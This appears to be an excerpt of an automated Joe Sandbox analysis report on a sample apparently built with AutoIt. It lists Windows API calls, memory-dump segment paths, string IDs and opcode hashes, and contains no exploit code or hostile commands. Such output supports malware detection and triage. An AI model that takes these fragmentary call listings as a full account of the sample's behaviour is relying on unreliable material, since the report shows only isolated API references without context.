                                        • API String ID: 2704283638-0
                                        APIs
                                        • __lock.LIBCMT ref: 00798768
                                          • Part of subcall function 00798984: __mtinitlocknum.LIBCMT ref: 00798996
                                          • Part of subcall function 00798984: RtlEnterCriticalSection.NTDLL(00790127), ref: 007989AF
                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00798775
                                        • __lock.LIBCMT ref: 00798789
                                        • ___addlocaleref.LIBCMT ref: 007987A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1687444384-0
                                        APIs
                                        • _memset.LIBCMT ref: 007DE14D
                                        • _memset.LIBCMT ref: 007DE15C
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00833EE0,00833F24), ref: 007DE18B
                                        • CloseHandle.KERNEL32 ref: 007DE19D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3277943733-0
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007B9C7F
                                          • Part of subcall function 007BAD14: _memset.LIBCMT ref: 007BAD49
                                        • _memmove.LIBCMT ref: 007B9CA2
                                        • _memset.LIBCMT ref: 007B9CAF
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007B9CBF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                        • String ID:
                                        • API String ID: 48991266-0
                                        APIs
                                          • Part of subcall function 0078B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0078B5EB
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B5FA
                                          • Part of subcall function 0078B58B: BeginPath.GDI32(?), ref: 0078B611
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B63B
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DE860
                                        • LineTo.GDI32(00000000,?,?), ref: 007DE86D
                                        • EndPath.GDI32(00000000), ref: 007DE87D
                                        • StrokePath.GDI32(00000000), ref: 007DE88B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AD640
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 007AD653
                                        • GetCurrentThreadId.KERNEL32 ref: 007AD65A
                                        • AttachThreadInput.USER32(00000000), ref: 007AD661
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 0078B0C5
                                        • SetTextColor.GDI32(?,000000FF), ref: 0078B0CF
                                        • SetBkMode.GDI32(?,00000001), ref: 0078B0E4
                                        • GetStockObject.GDI32(00000005), ref: 0078B0EC
                                        • GetWindowDC.USER32(?,00000000), ref: 007EECFA
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007EED07
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 007EED20
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 007EED39
                                        • GetPixel.GDI32(00000000,?,?), ref: 007EED59
                                        • ReleaseDC.USER32(?,00000000), ref: 007EED64
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: >$DEFINE
                                        • API String ID: 4104443479-1664449232
                                        APIs
                                        • OleSetContainedObject.OLE32(?,00000001), ref: 007AECA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ContainedObject
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3565006973-3941886329
                                        APIs
                                          • Part of subcall function 00773BCF: _wcscpy.LIBCMT ref: 00773BF2
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • __wcsnicmp.LIBCMT ref: 007BE785
                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BE84E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                        • String ID: LPT
                                        • API String ID: 3222508074-1350329615
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00771B83
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00771B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        APIs
                                          • Part of subcall function 0077417D: __fread_nolock.LIBCMT ref: 0077419B
                                        • _wcscmp.LIBCMT ref: 007BCF49
                                        • _wcscmp.LIBCMT ref: 007BCF5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscmp$__fread_nolock
                                        • String ID: FILE
                                        • API String ID: 4029003684-3121273764
                                        • Opcode ID: 740eb1488182eaffcebf0df3217a6a699867fb58a2a5b07b60d53562ccc60e01
                                        • Instruction ID: 21241199f8b8ddbffb6be74d6877a59257048fe5c37fbe844a7bf5775f7f8fe3
                                        • Opcode Fuzzy Hash: 740eb1488182eaffcebf0df3217a6a699867fb58a2a5b07b60d53562ccc60e01
                                        • Instruction Fuzzy Hash: BC410332A00219BEDF11EBA4CC85FEF7BBAAF49710F004469F615EB181D7799A44C750
                                        APIs
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • __getbuf.LIBCMT ref: 00799B8A
                                        • __lseeki64.LIBCMT ref: 00799BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                        • String ID: pMz
                                        • API String ID: 3311320906-1589057576
                                        • Opcode ID: be35d8cbc8679f2fa510d4b2af9a91efd5ab9c8f50dc64bf930f960b59db3f58
                                        • Instruction ID: e74ee9814c562c42f19bf3dfbe514bd6d188d6384a01e6e5aec595d895dcf127
                                        • Opcode Fuzzy Hash: be35d8cbc8679f2fa510d4b2af9a91efd5ab9c8f50dc64bf930f960b59db3f58
                                        • Instruction Fuzzy Hash: 1A4114B1500B059EEF348B7CF855A7A77E4AF86330F14861DE6AA876D1E77CD8408B60
                                        APIs
                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007DA668
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007DA67D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 4d5d523efd104a9af95f9da84d58985bf94b0d5d5c12d9ab1dc002c5f793267a
                                        • Instruction ID: 5da671ebe5168156d31b905a6316b4e87920a5ac49f95048d4de4808e5a3df08
                                        • Opcode Fuzzy Hash: 4d5d523efd104a9af95f9da84d58985bf94b0d5d5c12d9ab1dc002c5f793267a
                                        • Instruction Fuzzy Hash: 5541F275A00209EFDF14CFA8D880BDA7BB5BB09700F14446AE919AB381D774A951CFA1
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 007D961B
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D9657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: 31f7dec08d84e36b2fcfe178da50118ec1a8b89ad71e5fae66fedb52e1d37cff
                                        • Instruction ID: 4266f8c1f3a2bc5288ecc4a32bced934dfce47a046f8df175f742cbbe90bdba4
                                        • Opcode Fuzzy Hash: 31f7dec08d84e36b2fcfe178da50118ec1a8b89ad71e5fae66fedb52e1d37cff
                                        • Instruction Fuzzy Hash: BE31C131100204AEEB109F24DC84FFB77B9FF48754F10852AF9A9C7290CA39AC91D764
                                        APIs
                                        • _memset.LIBCMT ref: 007B5BE4
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B5C1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: b4365809a627a25345f2a073af5bcedd5f632dfe2a96a155ccbf7b495d6297b5
                                        • Instruction ID: 5c9c3260f83fc9b4746507049fe4085840aadf484bf9a8f21bac11202fc09718
                                        • Opcode Fuzzy Hash: b4365809a627a25345f2a073af5bcedd5f632dfe2a96a155ccbf7b495d6297b5
                                        • Instruction Fuzzy Hash: 2031953160070AEBDB248F98D989BEEBFF6EF05350F280019E985971A0D7B89944CF60
                                        APIs
                                        • __snwprintf.LIBCMT ref: 007C6BDD
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __snwprintf_memmove
                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                        • API String ID: 3506404897-2584243854
                                        • Opcode ID: 82e28b97de2d83e14ffde60f099c2cacc81bb55ba020655f274339acea2d88b8
                                        • Instruction ID: 3d46e22817f956b126499f90ffa197aa0a98379f352a1a215913c89b009490c7
                                        • Opcode Fuzzy Hash: 82e28b97de2d83e14ffde60f099c2cacc81bb55ba020655f274339acea2d88b8
                                        • Instruction Fuzzy Hash: DA21AE31600218EACF11EF94C886FAE77B5EF44740F004468F659E7282DA78EA41DBA1
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D9269
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D9274
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 9e9f7d81244a086a73fa529380ab90041844e22ca92bf9a4a5249e92a7918567
                                        • Instruction ID: 4ccda5515fb376a76fa97fabbb70514ada4691069b3e9a6328e89e09223e614b
                                        • Opcode Fuzzy Hash: 9e9f7d81244a086a73fa529380ab90041844e22ca92bf9a4a5249e92a7918567
                                        • Instruction Fuzzy Hash: 4B119371300108BFEF119E54DC80EAB777AFB893A4F104526FA1897390D639EC518BA0
                                        APIs
                                          • Part of subcall function 0078C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                          • Part of subcall function 0078C619: GetStockObject.GDI32(00000011), ref: 0078C66B
                                          • Part of subcall function 0078C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        • GetWindowRect.USER32(00000000,?), ref: 007D9775
                                        • GetSysColor.USER32(00000012), ref: 007D978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
